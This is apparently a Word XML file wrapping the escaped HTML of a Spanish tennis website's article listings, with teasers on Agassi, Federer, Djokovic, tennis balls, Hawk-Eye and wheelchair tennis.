    <w:p w14:paraId="0AB9AC1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100C4E8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432DEFF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545B4C1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4D82F02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33434A2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href="http://todosobretenis.com/entre-las-lineas-de-la-tinta/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377F9E8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35F20A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21792AA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065576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src="http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-400x240.png" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-400x240.png 400w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-300x180.png 300w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-768x461.png 768w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-590x354.png 590w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover.png 1000w"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src="http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-80x80.png" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-80x80.png 80w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-150x150.png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0AD5E58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4AD2415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7F22227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B900F7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40AED7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0EA124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class="mvp-stand-title"&gt;Entre las lÃ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neas de la tinta&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F6E58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&lt;p&gt;Fragmentos de la carrera de Rafael Nadal, Andre Agassi, Roger Federer y Pete Sampras quedaron explayados en obras literarias.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0A24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56EE015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03B5488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5CAB730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3868982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FA2DE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href="http://todosobretenis.com/se-cumplen-13-anos-del-primer-gran-titulo-de-djokovic/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CF9C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121685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04FE34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27287A3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src="http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-300x180.jpg 300w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-768x461.jpg 768w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-590x354.jpg 590w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440.jpg 1000w"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src="http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-150x150.jpg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56E52B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30B37B3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708A764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0AE822F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0693095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51DB439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class="mvp-stand-title"&gt;Hace 13 aÃ±os Djokovic conseguÃ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 su primer gran tÃ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tulo&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD265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&lt;p&gt;Con 19 aÃ±os, el serbio venciÃ³ en la final del Masters 1000 de Miami a Guillermo CaÃ±as&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A75993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3C8304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0940693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0710C5F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2988231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6B651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href="http://todosobretenis.com/pobres-leyendas/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B549A1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77A92C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302CF9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87B03B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src="http://todosobretenis.com/wp-content/uploads/2020/03/rod-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/rod-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/rod-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/03/rod-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/rod-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/rod-150x150.jpg 150w, http://todosobretenis.com/wp-content/uploads/2020/03/rod-560x558.jpg 560w"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324AF25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0040433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3C6014C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D0A418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D7FDBF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D264E0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class="mvp-stand-title"&gt;Pobres leyendas&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B237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&lt;p&gt;El tenis no siempre recompensÃ³ econÃ³micamente a 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dolos de tiempos pasados tan bien como lo hace en estos momentos&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DCD21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6F7597B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0D4A71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7BEB0E6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0394E35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01E2F4C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href="http://todosobretenis.com/como-se-fabrican-las-pelotas-de-tenis/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD60EA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00FDD12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244D888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D7B883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src="http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-150x150.jpg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1724D3C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7ADC25F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6AAA78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8E886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7B6C2C3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FE925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class="mvp-stand-title"&gt;Â¿Como se fabrican las pelotas de tenis?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4AD2C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&lt;p&gt;Este increible video muestra el paso a paso de la fabricaciÃ³n&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0784D11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0D5747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686E919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74D3D6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7DC9562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FFBAEC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href="http://todosobretenis.com/el-tenis-en-la-pantalla-grande/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656CC53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18D675F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767789C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62ED47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src="http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-300x180.jpg 300w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-768x461.jpg 768w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-590x354.jpg 590w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630.jpg 1000w"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src="http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-150x150.jpg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43EFDE2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642B24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661DD5B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19D1C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352DC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3CE525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class="mvp-stand-title"&gt;El tenis en la pantalla grande&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF9CB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&lt;p&gt;Te recomendamos las mejores tres pelÃ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culas sobre tenis&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C25A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098D0C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0333B05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7101A2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66B4696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323CA0E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href="http://todosobretenis.com/como-surgio-la-implementacion-del-ojo-de-halcon/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF5D43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23DB76C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3568BBF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0DFF960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src="http://todosobretenis.com/wp-content/uploads/2020/03/teni-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/teni-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/teni-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2020/03/teni-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/03/teni-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/teni-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/teni-150x150.jpg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212B2CD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1064D51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075036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B549B4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67D54C4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CDC320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class="mvp-stand-title"&gt;Â¿CÃ³mo surgiÃ³ la implementaciÃ³n del ojo de halcÃ³n?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2679435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&lt;p&gt;Tras varias fallas notorias por parte de los Ã¡rbitros, la ITF decidiÃ³ utilizarlo en los partidos.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A1F6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26346DD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4467AC4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5847DB7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57BBDB6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5CDD7AA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href="http://todosobretenis.com/por-que-las-pelotas-de-tenis-son-de-color-amarillo/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6356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642B6BC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70D1EC4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0627B3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height="230" src="http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-400x230.jpg" class="mvp-reg-img wp-post-image" alt=""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src="http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-150x150.jpg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1D1CFC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7C10152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1007E0F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194E4A4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6B8585B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C67FFE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class="mvp-stand-title"&gt;Â¿Por quÃ© las pelotas de tenis son de color amarillo?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD1C1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&lt;p&gt;Por el auge de la televisiÃ³n, la ITF se vio obligada a modificar el color.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C35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2D6FE50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38B1FFD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1FB144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6EAC612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617E0D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href="http://todosobretenis.com/cuando-roger-federer-jugo-la-primera-final-atp-de-su-carrera/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D19A9F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1C9B41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0B3A14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E21DC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src="http://todosobretenis.com/wp-content/uploads/2020/02/roger-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/02/roger-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/02/roger-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/02/roger-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/02/roger-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/02/roger-150x150.jpg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0427FB4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0CDFA81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7B3F3C6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3FD76B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6DC10E6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2521B7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class="mvp-stand-title"&gt;Cuando Roger Federer jugÃ³ la primera final ATP de su carrera&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3CD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&lt;p&gt;Fue el comienzo de una larga carrera&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C7A6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2B5FF42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1B26E50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3E2DC5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7CFF2FB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4D68CB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href="http://todosobretenis.com/pedro-sousa-el-finalista-afortunado-del-argentina-open-2020/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E157D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00F2D9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7F805F3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7AD0A7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src="http://todosobretenis.com/wp-content/uploads/2020/02/sousa-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/02/sousa-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/02/sousa-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2020/02/sousa-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2020/02/sousa-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/02/sousa-150x150.jpg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31C90AA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08AA3A4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058A839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DE640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relative"&gt;Buenos Aires&lt;/span&gt;&lt;span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753F54A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19A0291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class="mvp-stand-title"&gt;Pedro Sousa, el finalista afortunado del Argentina Open 2020&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30564DA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&lt;p&gt;AvanzÃ³ a la final del ATP de Buenos Aires tras la baja de Schwartzman en semifinales&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ECB1E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087240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2211835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14E8FB1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48F5BB0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61510A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href="http://todosobretenis.com/el-tenis-un-deporte-blanco/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C9B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6768A05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33DBC6E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116A66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src="http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-150x150.jpg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39EE33B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024338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67EE3A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394BB12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7D798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1505523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class="mvp-stand-title"&gt;Â¿Por que se conoce al tenis como un deporte blanco?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082ECEE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&lt;p&gt;El tenis, tambiÃ©n conocido como el deporte blanco por su historia, empezÃ³ a ser jugado en las clases altas europeas....&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C4817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3BA743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1AE53CC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67587C4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48A554B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09AEBF0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href="http://todosobretenis.com/el-sistema-de-puntuacion-en-el-tenis-de-donde-proviene/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE42AC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3F49814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01F0BB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0B669C7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src="http://todosobretenis.com/wp-content/uploads/2016/12/marcador-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2016/12/marcador-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2016/12/marcador-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2016/12/marcador-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2016/12/marcador-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2016/12/marcador-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2016/12/marcador-150x150.jpg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7A8C3BA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70D91A4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53D2BFC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71444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3F8E413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F6836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class="mvp-stand-title"&gt;Â¿De dÃ³nde proviene el sistema de puntuaciÃ³n del tenis?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C10873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&lt;p&gt;Te contamos las diferentes teorÃ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sobre el sistema de puntuaciÃ³n en el tenis&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5120A77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6CC47F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494DF0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4E00EA7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14309D7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815D93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href="http://todosobretenis.com/el-coleccionista-de-raquetas-amigo-de-vilas/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939E30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6CC830A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57005D9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412ACA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src="http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-150x150.jpg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1B75DA0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133B3A0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622F054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0EB29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895756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38C60D3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class="mvp-stand-title"&gt;El coleccionista de raquetas amigo de Vilas&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6E40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&lt;p&gt;La historia de Alejandro Diorio, el coleccionista de raquetas que logrÃ³ hacerse amigo del gran Vilas&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96DE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48F3D4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4D1F187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3CFA527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6A3A72C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5F52041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href="http://todosobretenis.com/sabes-elegir-raqueta/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6873273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24B357E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0F40B96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1154E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src="http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-400x240.jpg" class="mvp-reg-img wp-post-image" alt=""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src="http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2017/10/como-elegir-tu-raqueta-150x150.jpg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69726E0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65F3EC5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59BEB1B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03B50A8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5361D4B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6B29DA4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class="mvp-stand-title"&gt;Â¿Sabes cÃ³mo elegir tu raqueta?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA89EC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&lt;p&gt;Te damos algunos tips para que puedas elegir la raqueta indicada&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E10EC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4F013F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7DFEAA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2DEE91F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34639AB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C32FE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href="http://todosobretenis.com/odio-los-llevo-la-gloria/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D76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3163E0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5FBA9A0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14B3FC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src="http://todosobretenis.com/wp-content/uploads/2017/10/agasi-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2017/10/agasi-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2017/10/agasi-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2017/10/agasi-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2017/10/agasi-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2017/10/agasi-150x150.jpg 150w, http://todosobretenis.com/wp-content/uploads/2017/10/agasi-560x554.jpg 560w"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57DC1B9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321B19A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54B4763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A28AFB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75E9EA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9C6D37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class="mvp-stand-title"&gt;El odio los llevÃ³ a la gloria&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAC5F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&lt;p&gt;CÃ³mo a pesar de odiar el tenis, Andre Agassi pudo ser uno del deporte&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE8775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2737FF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2A41895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2F3FB29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39B323B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86E340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href="http://todosobretenis.com/se-cambian-las-pelotas-nueve-games-los-partidos/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE660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572DF07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186DF23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4CF2400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src="http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--400x240.jpg" class="mvp-reg-img wp-post-image" alt=""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src="http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2017/09/ball-boy-tenis--150x150.jpg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048E7BA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6929560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71D55C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15D8D6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D06C8D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853B5D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class="mvp-stand-title"&gt;Â¿Por quÃ© se cambian las pelotas cada nueve games durante los partidos?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7331B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&lt;p&gt;En todos los partidos, cada nueve games se cambian las pelotas. ConocÃ© el motivo&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144675E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6E25B22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373135F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75F0723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2459886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9D1F5A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href="http://todosobretenis.com/cuando-el-tenis-se-transforma-en-rina-de-gallos/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9467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12A1B57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60BBC62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1EADFF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src="http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2015/08/los-dos--150x150.jpg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1434196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2DBE74E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7E98AE5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266392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66AC0B8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7143ED6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class="mvp-stand-title"&gt;Cuando el tenis se transforma en riÃ±a de gallos&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F73F5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&lt;p&gt;Recordamos algunas de las peleas mÃ¡s insÃ³litas dentro de una cancha de tenis&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0945CBF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55AF8B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4A8822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63985AD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66E171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71BBBB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href="http://todosobretenis.com/cuando-federer-fue-numero-uno-primera-vez/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1994C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526E9F2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78DC0F0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2D396F6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src="http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2018/05/federer-primera-vez-150x150.jpg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0F73F0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6DD7908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01D1100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C605C7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7C83A7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777D40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class="mvp-stand-title"&gt;Cuando Federer fue nÃºmero uno por primera vez&amp;#8230;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0DE07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&lt;p&gt;Bastantes cosas han cambiado desde que el suizo se proclamarÃ¡ nÃºmero por primera vez.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6A145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069B544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0FFC04C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524F09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3D3F6A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44D577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href="http://todosobretenis.com/el-deseo-de-ser-jugadora-de-tenis-renee-richards/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C537B9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39B95EB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177487C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6C898E3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src="http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2015/05/renee-richards-150x150.jpg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7421EBA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5459984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0C3350A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7A907D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A9F2E7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67C6066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class="mvp-stand-title"&gt;El deseo de ser jugadora de tenis: RenÃ©e Richards  Â &lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F1B88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&lt;p&gt;La historia de la tenista trans que fue rechazada en el circuito cuando se enteraron de su condiciÃ³n sexual&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41C6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3C5994D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53B085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35FB87B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0D91EDD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325D343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href="http://todosobretenis.com/cuando-la-tierra-de-madrid-fue-azul-2/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA8A17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 mvp-flex-col-noad"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46D4E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346376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66CA62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src="http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2018/05/madrid-azul--150x150.jpg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7D24CC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07B81D4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3D47057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8AA025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relative"&gt;Curiosidades&lt;/span&gt;&lt;span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5D29C35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2636B4D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class="mvp-stand-title"&gt;Cuando el polvo de ladrillo de Madrid fue azul&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC59C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&lt;p&gt;El Masters 1000 de Madrid fue el primer e Ãºnico torneo en tener polvo de ladrillo azul&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07141A1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29393BF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13BE769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0CD8E6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780282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3488C3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&lt;/div&gt;&lt;!--mvp-flex-story-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613785F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&lt;/div&gt;&lt;!--mvp-widget-flex-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B8E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7E38A30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&lt;/div&gt;&lt;/section&gt;&lt;section id="mvp_flex_widget-12" class="mvp-widget-home left relative mvp_flex_widget"&gt;&lt;div class="mvp-main-box"&gt;&lt;div class="mvp-widget-home-head"&gt;&lt;h4 class="mvp-widget-home-title"&gt;&lt;span class="mvp-widget-home-title"&gt;Tenis adaptado&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3C57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class="mvp-widget-flex-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A88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class="mvp-flex-side-out left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D815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class="mvp-flex-side-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36E9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class="mvp-flex-story-wrap left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51995AC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href="http://todosobretenis.com/es-muy-diferente-el-tenis-adaptado-al-tenis-de-pie/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C069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mvp-flex-col"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6A71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35D46F4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31BDCC7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src="http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-400x240.jpg" class="mvp-reg-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-590x354.jpg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src="http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-80x80.jpg" class="mvp-mob-img wp-post-image" alt="" srcset="http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2016/05/dani-caver-150x150.jpg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5958AFC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3A5BCC3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6EB5536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3D4DB44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relative"&gt;Tenis adaptado&lt;/span&gt;&lt;span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690A704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5082DF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class="mvp-stand-title"&gt;Â¿Es muy diferente el tenis en silla de ruedas al tenis de pie?&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BCDEE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&lt;p&gt;Las principales diferencias entre el tenis en silla de ruedas y el tenis de pie&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BFB5D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5CAF808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53E26DD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309CD72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0BF6CB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15E17A6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href="http://todosobretenis.com/mi-primera-experiencia-en-el-tenis-de-sillas-de-ruedas/" rel="bookmark"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062079F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 left relative mvp-flex-col"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F397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class="mvp-flex-story-out right relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A21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class="mvp-flex-story-img left relative"&gt;</w:t>
      </w:r>
    </w:p>
